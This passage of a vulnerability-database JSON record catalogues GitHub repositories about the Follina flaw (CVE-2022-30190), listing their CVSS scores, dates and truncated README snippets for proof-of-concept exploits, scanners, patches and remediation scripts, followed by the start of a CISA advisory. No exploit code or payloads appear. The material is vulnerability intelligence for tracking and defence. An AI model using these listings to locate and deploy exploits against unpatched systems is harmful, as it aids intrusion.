"cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-16T00:04:19", "id": "6AF23F99-AE40-5899-AD81-AE3F71760F38", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-11T16:29:00", "description": "# Follina-CVE-2022-30190-Unofficial-patch-\nAn Unofficial Patch F...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-13T04:20:02", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-11T14:26:36", "id": 
"56417A88-33CB-520F-8FC3-4F3E49561DDC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-02-02T12:12:07", "description": "# FollinaExtractor\nExtract ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-15T02:22:53", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-02-02T09:37:21", "id": "675E960A-9F2E-5575-8C21-8528492BE5C6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-11-01T17:02:57", "description": "CVE-2022-30190\r\n\r\n# IMPORTANT\r\n\r\n## Patched as of:\r\nJune...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T16:14:13", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-11-01T16:41:09", "id": "2D9FF49E-AD93-5397-80B0-B02DED73DEA6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-31T05:34:20", "description": "# 'Follina' MS-MSDT n-day Microsoft Office RCE\u2014\u4fee\u6539\u7248\n\n\u6839\u636e https://g...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T12:33:18", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-31T03:27:00", "id": "0AD00567-1561-5CE2-8DA5-E64B286CBCAC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-11T16:29:03", "description": "# Follina-CVE-2022-30190-Unofficial-patch-\nAn Unofficial Patch F...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-13T04:20:02", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-11T14:26:36", "id": "5B74BEF9-0D39-5A60-8806-ABA55730878C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-11-15T20:18:26", "description": "# CVE-2022-30190\n\n[_**\nThese are t...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-12T11:48:22", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T10:20:20", "id": "4881AA63-B127-594A-8F5B-ED68FD4BB9FF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-29T02:56:26", "description": "# folli...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-15T09:13:05", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T09:15:12", "id": "0E951B86-8BC4-54D9-BE2B-7B5DD988D1A0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-25T20:06:34", "description": "# go_follina\n\nFollina ([CVE-2022-30190](https...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-27T16:14:34", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-25T13:54:32", "id": "45B4D881-57D9-51C8-B5B9-9A6DA7413A36", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-20T17:21:16", "description": "# Follina-CVE-2022-30190-Sample-by-ethical-blue\n Educational Fol...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": 
{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-25T16:27:59", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-20T16:04:27", "id": "FB757D3A-A896-5AB5-B72B-7C880581D12E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-10T10:59:21", "description": "# CVE-2022-30190\nMitigation for CVE-2022-30190\n\nScript requires ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-10T00:23:11", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-10T00:25:47", "id": "8FDF5020-8C7F-5695-ADD0-58100BD21FFF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-10T16:12:06", "description": "# Deathnote\n<p align=\"center\">\n \n<img src=\"https://media3.giphy....", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-08T10:58:23", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-10T15:39:45", "id": "70407390-C149-54F1-89B0-7611FB420601", "href": "", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-11-09T23:43:05", "description": "```console\n$ gollina -h\n\n gollina\n Follina MS-MSDT 0-day MS Of...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T09:02:00", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-11-09T18:15:55", "id": "FC455648-370A-582B-A03A-6299DDC272F6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-28T02:26:42", "description": "**NOTE**: This tool is now **obsolete**! 
[The Follina exploit is...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T02:47:34", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-27T23:35:56", "id": "30F42F9A-5E27-592E-BE65-B85DC7E22075", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-27T20:31:47", "description": "# Follina-Remediation\nRemoves the ability for MSDT t...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T20:26:56", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": 
"HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-27T20:26:21", "id": "5DC52EE8-31C1-5E05-8AC1-8385C2002254", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-25T12:18:12", "description": "# follina (POC)\nAll about CVE-2022-30190, aka follina, that is a...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-03T00:25:37", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-25T10:24:05", "id": "221070D3-0B31-5CF7-A508-B4740B63647B", "href": 
"", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-27T05:15:40", "description": "[...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-19T18:09:47", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-27T02:19:43", "id": "DD36D028-7FB1-5824-9756-09BA3927DCEE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-02T22:57:37", "description": "# CVE-2022-30190\n\nCVE-2022-30190\nCVE-2022-30190 Follina POC\n\nHos...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": 
"2022-06-02T07:01:19", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-02T07:03:36", "id": "9CB70E27-04CC-50BC-9F3E-2907ABA654EA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-11-24T12:19:34", "description": "# FollinaScanner\nA tool written in Go that scans files & directo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T06:45:19", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-11-24T11:52:03", "id": "FD6B81DE-3BFF-5BC7-BD1F-E90103B8FBEF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-02-07T02:34:47", "description": "# follina_cve_2022-30190\nA proof of concept to CVE-2022-30190 (f...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-10T14:57:17", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-27T02:17:48", "id": "BAA0F684-952E-5B9E-B207-0419A33AC53B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "cisa": [{"lastseen": "2022-06-03T13:56:12", "description": "Microsoft has released workaround guidance to address a remote code execution (RCE) vulnerability\u2014CVE-2022-30190, known as \"Follina\"\u2014affecting the Microsoft Support Diagnostic Tool (MSDT) in Windows. 
